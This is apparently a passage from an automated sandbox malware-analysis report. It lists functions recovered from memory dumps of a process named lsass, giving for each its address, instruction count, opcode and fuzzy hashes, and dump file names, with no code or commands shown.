Opcode ID: 8e7caf1cff0ce8db7bc2e261e2aa7ebeb42e2e944f14d75ab313248aca64c916
Instruction ID: 146b4aeb97b178ac49a2fde6ed2062f7d96d5800a017d2a300c9140db023fb5c
Opcode Fuzzy Hash: 8e7caf1cff0ce8db7bc2e261e2aa7ebeb42e2e944f14d75ab313248aca64c916
Instruction Fuzzy Hash: CB516120B1995D4FE7A8FB68C4AA6B873D2FF98710F4141B9E40DC32E2DD296D458781

Function 00007FFD9BAA08D0 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d7da9bb43db139e57fd48fe4311c5889e53862978ca359c542ab04b8f779cfd
Instruction ID: 16d363e577bc85e899e2799fcda29c78ccbb8f70df69b26c04e48ca61c52a0cf
Opcode Fuzzy Hash: 3d7da9bb43db139e57fd48fe4311c5889e53862978ca359c542ab04b8f779cfd
Instruction Fuzzy Hash: 2F415622B0C5590FE318F7BCA4A5AF97781EF9933AB0445BBE44ECB1D7CD18A841C284

Function 00007FFD9BAA0910 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e3c4e9649354bb7d41b9191a7432888d1cbd5ea5ad65f164ca3644a36f4691f
Instruction ID: fd8dc445c82cd57217f4fbd0a080b43b741862e3a170948aa8c1bc658b6d646b
Opcode Fuzzy Hash: 1e3c4e9649354bb7d41b9191a7432888d1cbd5ea5ad65f164ca3644a36f4691f
Instruction Fuzzy Hash: 7041E422B0C5590FE358B7BCA4A99F87781EF5933AB1445BBE44ECA1D7DD18A841C284

Function 00007FFD9BE95637 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53789e7afff5cd272ce38db2a62ac8fb3f07bae3ca14fead55862fe8f788d847
Instruction ID: a78fd0393df798a5d7279520be512a743bf2127073ff4ee9a1b140aa62e7e610
Opcode Fuzzy Hash: 53789e7afff5cd272ce38db2a62ac8fb3f07bae3ca14fead55862fe8f788d847
Instruction Fuzzy Hash: E241563270C9088FDF98FF18C499DA577D1FB68325B04416AD44AC7592DE35F945CB81

Function 00007FFD9BE90497 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f899e6017b279f002557cf9653e2fe417b6fe7911341195e6d1a70a36e27f2af
Instruction ID: f8554eb8eef723803981f61325eb2d8f2d4eadc5cd94e559fe1cbe599860c002
Opcode Fuzzy Hash: f899e6017b279f002557cf9653e2fe417b6fe7911341195e6d1a70a36e27f2af
Instruction Fuzzy Hash: B1414F3160D9098FDF98FB18C469EA473E1FFA9724B0441AAD04EC7692DE35F845CB81

Function 00007FFD9BE956E1 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a88c06ca4f2400937054b732fd576d3b1568744e9d3f298907855179ff43efd
Instruction ID: 029ae9470ff4a95a95a81218183b26ab44b2d58cd3f418e2d853f6a538648568
Opcode Fuzzy Hash: 0a88c06ca4f2400937054b732fd576d3b1568744e9d3f298907855179ff43efd
Instruction Fuzzy Hash: 4531733160CA488FDF98FF28C8A9D6477E1FF68325B0442A9D45AC75A2DE35F845CB81

Function 00007FFD9BE90541 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8ca3423f8c3bc6e2421ea907feadfd738972e3a3d503534f6951d81ca91536e
Instruction ID: 9abb39346e284c97d38773f5c280437349c6dce7d0a03c004e85baffe01b4227
Opcode Fuzzy Hash: c8ca3423f8c3bc6e2421ea907feadfd738972e3a3d503534f6951d81ca91536e
Instruction Fuzzy Hash: 22316F3160C9488FDF5CFB18C469EA477E1FFA931470442AAD05AC7692DE25F845CB81

Function 00007FFD9BAA0960 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bbb8f13feb3d878b3583799f9ecaf0d3080ba59e3a859bee52442560068c643
Instruction ID: 1892ba1e47363df55a2d16a3820472643fa28bbee2585e90118b8e959b388cb9
Opcode Fuzzy Hash: 0bbb8f13feb3d878b3583799f9ecaf0d3080ba59e3a859bee52442560068c643
Instruction Fuzzy Hash: C531F721B1C91D0FE368B76C646AAF973C2DF5832AF0045BBE40EC71D7DD18AC418294

Function 00007FFD9BE9E9CD Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a9a7893c479c20d253ad4ec85a4d6dc214feb556bcca5455f6cdd449134fd8e
Instruction ID: 00b8afb224162b1e5ecaf61e80ae9d8705cd0d32d259a62de48398c8e4f207c4
Opcode Fuzzy Hash: 9a9a7893c479c20d253ad4ec85a4d6dc214feb556bcca5455f6cdd449134fd8e
Instruction Fuzzy Hash: DD31F042A0FBC50FD72642B91C290A67FA0AF5265031D42FFE1D89A5F7DA49AD4D8383

Function 00007FFD9BE9567B Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c74f1181c56e331568ea63d1ee350c86884ad9b7ae3b7d596a9264504d5f3c92
Instruction ID: 3f145b964f7af795a933f622a88481b2e3ed4765e794f79165cc134d43e93385
Opcode Fuzzy Hash: c74f1181c56e331568ea63d1ee350c86884ad9b7ae3b7d596a9264504d5f3c92
Instruction Fuzzy Hash: 6131523160CA098FDF98FF28C4A9DA5B7E1FB68314B0442A9D44AC75A2DE35F945CB81

Function 00007FFD9BE904DB Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 105415f72ffdbdb86ec84aa0816da059fb6ee7a9218355fd309d666f00203f39
Instruction ID: b52cd4abfc2a1d71248914382ad89b4612f011dc94bbbdf9f4721452beb9a211
Opcode Fuzzy Hash: 105415f72ffdbdb86ec84aa0816da059fb6ee7a9218355fd309d666f00203f39
Instruction Fuzzy Hash: D2314F3160C9498FDF6CFB18C469EA473E1FFA971470441AAD04AC7692DE25F885CB81

Function 00007FFD9BE902A5 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cee8aa3457856ca768d197e48d4d55c8c2c9e24c5897a3c1ccdebd3fb61a2d84
Instruction ID: f2a28cb2a7aa03034fee5b30895ec370e3737cc0692dbc93d285df5e05444067
Opcode Fuzzy Hash: cee8aa3457856ca768d197e48d4d55c8c2c9e24c5897a3c1ccdebd3fb61a2d84
Instruction Fuzzy Hash: 07318D30A0EA4ECFEBA8DF9484615BD77B4FF44B01F91017AD00EC21A2DB3A6E448745

Function 00007FFD9BE95445 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab646dd548d444271d98a662cc97503e4e20e350f003acff61802e812924afb5
Instruction ID: 9379b1c3f243dd6740c60596d750efe600d48d00c0dba30911f9b5deba5c7356
Opcode Fuzzy Hash: ab646dd548d444271d98a662cc97503e4e20e350f003acff61802e812924afb5
Instruction Fuzzy Hash: B5318D30E1E60ECFEBA8DB9484665BD77F5FF44301F51007AD40FC21A2DA3A6A488B41

Function 00007FFD9BE9279D Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecb48d7edd7cc99cdca2fc5bff09fe71bb9386699a0f222b41c69865cb08453a
Instruction ID: 02f7ca7e2d4af192edd636b97ea36489d0d19e037f38c4a2691c821ab1ad2b08
Opcode Fuzzy Hash: ecb48d7edd7cc99cdca2fc5bff09fe71bb9386699a0f222b41c69865cb08453a
Instruction Fuzzy Hash: F731A671B09A0E5BDB58DBACC4665BCF7A1FF44310B554239D04AD3296DF247912CB80

Function 00007FFD9BAA0998 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6028f649cc811efd3648019a2ee4d68182c00139fc0cf788d372697e9d3fb28
Instruction ID: 6853346d5d69d3f612e822dbd714885bd39361037c0492fb8671af6dae528d73
Opcode Fuzzy Hash: f6028f649cc811efd3648019a2ee4d68182c00139fc0cf788d372697e9d3fb28
Instruction Fuzzy Hash: 88214620B1891D0FE798F76C946AA7972C3EF98324F4040BEE40EC32E7DD58AC418295

Function 00007FFD9BE92873 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a3793533556954fc6b87386c50c90dbfdd44c1feb49d1ba0cc142826ec43ac8
Instruction ID: 24a0733fb0df3a694f03a834dfb276a56665b5dad4dac5f057217f0d9bcb4014
Opcode Fuzzy Hash: 2a3793533556954fc6b87386c50c90dbfdd44c1feb49d1ba0cc142826ec43ac8
Instruction Fuzzy Hash: 98210621F0E78D4FEF69A7E894662F87BE5EF55314F150179D08EC21D3DA1AA90A8340

Function 00007FFD9BE94331 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15ea57fb49a89f53cae2fb362b50d42ec611eb9c66de8de79f312da9b8c1a6b6
Instruction ID: b240ad78e21f12e361764895f69e6db6940e9d888ce53b8284f13d3d7ddfce40
Opcode Fuzzy Hash: 15ea57fb49a89f53cae2fb362b50d42ec611eb9c66de8de79f312da9b8c1a6b6
Instruction Fuzzy Hash: 01317810A1E5DA4BE33AD76848B49B47B75EF5630171D46FEC09ACB4E7C82DBA88C341

Function 00007FFD9BE9D485 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1080a6d2f2b61bb872a9b664798cce5a5671516d23f399d0dfa631f87aeb81b
Instruction ID: 80057b5abdf149fbd0b6a111fb12875dec10ed8861b6fe5436591eee230bf0ca
Opcode Fuzzy Hash: b1080a6d2f2b61bb872a9b664798cce5a5671516d23f399d0dfa631f87aeb81b
Instruction Fuzzy Hash: F921F821B0EA4D4FE354EBB888A477473D1EF99314F0582BAD00DCB2E7CE6D69498341

Function 00007FFD9BAA0C25 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99b0bcd1f3fc8372a06d709e5e7a10dfd24fe91f58af2e23a1e6b671c003657f
Instruction ID: 5bc38230dc4480a22edf620031fe9e4d437d6a8782cfa65fedf0a04d9d863ead
Opcode Fuzzy Hash: 99b0bcd1f3fc8372a06d709e5e7a10dfd24fe91f58af2e23a1e6b671c003657f
Instruction Fuzzy Hash: 9B210736B0D64D8AE732ABA898510DC7B60EF81325F0545B3D04CCF1D3D968264AC7A5

Function 00007FFD9BE91732 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5666c3f6486c7aa80c8778b1a83fe85014bf87a840ddf9f364e334d3c5092cfd
Instruction ID: 59b81b7feaacfc229d649e20268329367fa3ee3a9e6707611b138ae11755d3ce
Opcode Fuzzy Hash: 5666c3f6486c7aa80c8778b1a83fe85014bf87a840ddf9f364e334d3c5092cfd
Instruction Fuzzy Hash: EA21FB31E0991D9FDF98EB58C865AEDB7B1FF58304F0041A9D04EE32A1CE35A944CB41

Function 00007FFD9BE90BE8 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 008fb3e3c86ae656f875ee9a84c7b9f44b7fa2b4bc75c7723e07fac6ec0e5dc8
Instruction ID: 4ba56a04fd82ef4ea02f8e013cbbe9b1595450ab820b721ee6e98ee2f0aa0971
Opcode Fuzzy Hash: 008fb3e3c86ae656f875ee9a84c7b9f44b7fa2b4bc75c7723e07fac6ec0e5dc8
Instruction Fuzzy Hash: C6218E31E1994ECFDF98DB98C8A09ECB7B5FF58700F50017AD01AE32A2DA296D45CB00

Function 00007FFD9BE926D9 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf2282ee47e3a34b4ef2f14a3f04e102de71464ecaf7b447a6e78bbe1f9e987e
Instruction ID: 2c74b085cfa0a8610d4644fa060895fc06541fec8c440e2540eec03f4cce9b1b
Opcode Fuzzy Hash: cf2282ee47e3a34b4ef2f14a3f04e102de71464ecaf7b447a6e78bbe1f9e987e
Instruction Fuzzy Hash: E2117821F0E78D4FDB7991E448652F937E5EF5B340F05017AE049E70A3DC5A290A8351

Function 00007FFD9BE939E2 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b449622db5612ae5e5dbd9d50625730a5b8c7d295be9332527f17fa19199069
Instruction ID: 3dbb8fce42a4807459ac888c9bb88479173dbd399379342811fa00aecc541bc3
Opcode Fuzzy Hash: 9b449622db5612ae5e5dbd9d50625730a5b8c7d295be9332527f17fa19199069
Instruction Fuzzy Hash: 5A21F330709A0A5FE799EB58D0646B5B3A1FF54314F11823AC40EC2BEADF79E9558BC0

Function 00007FFD9BE94360 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60807da3f3de170f47d571a338e5b7b0f8829ed1d5bf1775970a9f6d8918fe60
Instruction ID: 50751b0a873cd89e9a9ed446945731aaaf32aa0eae797cc64b12d0f3a234c098
Opcode Fuzzy Hash: 60807da3f3de170f47d571a338e5b7b0f8829ed1d5bf1775970a9f6d8918fe60
Instruction Fuzzy Hash: 1D112010B2E86F47F63CD65448749B47775EF64301719467DC45BCB4EAC82DBAC89381

Function 00007FFD9BE9D4A0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ce1a327c1ed8bbb69cb2402a0d2f3dbf5d80f609b35e16aae49d3bb4ea5eae8
Instruction ID: 550cbdcd8980f2683407528fcc2d298879581a6ae7e851103a85db304cb03a1e
Opcode Fuzzy Hash: 4ce1a327c1ed8bbb69cb2402a0d2f3dbf5d80f609b35e16aae49d3bb4ea5eae8
Instruction Fuzzy Hash: 1211E921B0990D4BE758FB7888A5B7572D5EF9C314F01827AE41EC72E6CE2D68488340

Function 00007FFD9BAB4229 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2039760726.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9bab0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 968e54f83fad1db97bb844dadc8a545acbd0d10948fae0e08e510630d3eee526
Instruction ID: d39d5cbeab922206ab77de4cbbb2048335d6469cf6201e4b5da865c1fad0fc1a
Opcode Fuzzy Hash: 968e54f83fad1db97bb844dadc8a545acbd0d10948fae0e08e510630d3eee526
Instruction Fuzzy Hash: C8116071F0851F8BEB64EB98C8256BD77A1EF54314F10063ED029C72E5DFB86A418A81

Function 00007FFD9BAA3194 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 585011ca9e5b3083aaae3c1fb4e9b71dfdb6fde84943405d5deb15928806df1d
Instruction ID: f8459353b2f853158c0f66784987d2b5f305d3b060a9a6a12f596c5e13bf3b3f
Opcode Fuzzy Hash: 585011ca9e5b3083aaae3c1fb4e9b71dfdb6fde84943405d5deb15928806df1d
Instruction Fuzzy Hash: 56119420F0A90E4FEBB4EB9888746B876E3EF58711F1142B6C40DD32B1DD68AE448B50

Function 00007FFD9BAA0C38 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d28d277057d36eb67845eec8069c46d6d99253bb9a672f197332ccbdb199aa34
Instruction ID: e3ca8fa6d0921ed3253570a76162bdd21165d4e4faa083d7e74e2c3e33cd49aa
Opcode Fuzzy Hash: d28d277057d36eb67845eec8069c46d6d99253bb9a672f197332ccbdb199aa34
Instruction Fuzzy Hash: 0011C635B0E68D8FE731DFA8886519C7FB1EF42711F0645F7C088DB1A2D574164987A4

Function 00007FFD9BE9816C Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d74ff2ac68520297766aebd76c539baaeb4616e3f3400d4c5e9856050276b83a
Instruction ID: b71f8ace2130d50f02003c48b55ce76a46cae34193d0b04b800f25f3614c18d6
Opcode Fuzzy Hash: d74ff2ac68520297766aebd76c539baaeb4616e3f3400d4c5e9856050276b83a
Instruction Fuzzy Hash: C601843070A60E8BE7389B54C4A17793795FF94344F52027AC05A972B3DE3DBA498785

Function 00007FFD9BAA0C40 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1210c6f149a47f69fc02331fd5050f2dfcaf026f31ca9fd447148f2ccc0831b
Instruction ID: 360ea816e2c7504f28c4fdf7306e062410b670ba00d8739fdd3db69be8d41542
Opcode Fuzzy Hash: a1210c6f149a47f69fc02331fd5050f2dfcaf026f31ca9fd447148f2ccc0831b
Instruction Fuzzy Hash: A0010435B0E38C8FE722DFA8886419CBFB1EF42710F0645F7C088CB1A2D97426498764

Function 00007FFD9BAA49B6 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa0e1f1c802e6ea1b851d76c5de6500163d2ec3a0510baad5e974e278c5064ea
Instruction ID: 3d460acee9209248ae545de61fdc40cd5322b73e5cc6aa623cf21a23a3c7f7c9
Opcode Fuzzy Hash: fa0e1f1c802e6ea1b851d76c5de6500163d2ec3a0510baad5e974e278c5064ea
Instruction Fuzzy Hash: CA11C37190496C8FDBA4DF04C894B9D77B1EB58301F1585AED40EE72A0CE75AE84CF85

Function 00007FFD9BE9D120 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29452f3b04c217cb28f3bb0257b9810f4b6373964789715b0b6b9bfcfffbdeaa
Instruction ID: 1598829738570b37f454fb072199bc0e8a7aed94e8c33e5b243901e0e69abe4a
Opcode Fuzzy Hash: 29452f3b04c217cb28f3bb0257b9810f4b6373964789715b0b6b9bfcfffbdeaa
Instruction Fuzzy Hash: 2D017530B09A0E8BE339EB44D4657B532D5FB94304F11467DD84FC22E2DF3DA98A8689

Function 00007FFD9BAA0C48 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2039760726.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9baa0000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d12f4620f475cc0f2373907d8cfd15450661b6f595f34a5d627a98fd5cbfabb7
Instruction ID: 0842613c28fa6246b685083414a53d6f204e5d264d6e372224b1afbf9384dd7f
Opcode Fuzzy Hash: d12f4620f475cc0f2373907d8cfd15450661b6f595f34a5d627a98fd5cbfabb7
Instruction Fuzzy Hash: B5019235A0E38D9FD721DFA4885419CBFB1EF42710F1641E7D088DB1A2D9746645C754

Function 00007FFD9BE981E1 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2c4b260a0a690bf632b716d096113f5a97900bbc27a798199006ecc31e60521
Instruction ID: abd6f4d777beedcc9603ba3278557e4bd0c9f7583ff56d54412a5a7f03d916ba
Opcode Fuzzy Hash: d2c4b260a0a690bf632b716d096113f5a97900bbc27a798199006ecc31e60521
Instruction Fuzzy Hash: 0501D130A0970D8BD734DF54C4917A933A0FFA4310F11027AC046972A3CB3AA945CBC0

Function 00007FFD9BE93260 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98a50abead63831e7fec01418b48ab593748453b7c04d48aca80e5bbcc60c36e
Instruction ID: 7651de96b485b5a6a0222738d6905f769e62ecf6a9dccb6e0068e3e208255415
Opcode Fuzzy Hash: 98a50abead63831e7fec01418b48ab593748453b7c04d48aca80e5bbcc60c36e
Instruction Fuzzy Hash: F601AC3134E24A8FC716CBA8D4A56E9BBA0EF52324F2842BED845C71E2CA5A5614C780

Function 00007FFD9BE91A42 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2047747012.00007FFD9BE90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffd9be90000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 015c0c172b243d6839e97c087b72de9b85d62d94a4c3b5f573446f096a2da7fb
Instruction ID: 5da689b14c541d2f5f459769abee1ea138929c4fc4d99b907fdc2036e211ef1f
Opcode Fuzzy Hash: 015c0c172b243d6839e97c087b72de9b85d62d94a4c3b5f573446f096a2da7fb
Instruction Fuzzy Hash: D3F0963154F3C9AFD7268BB088255E93FB8EF43254B1A00F6D495CB0B2C56D5B4AC762

Function 00007FFD9BAA0C50 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

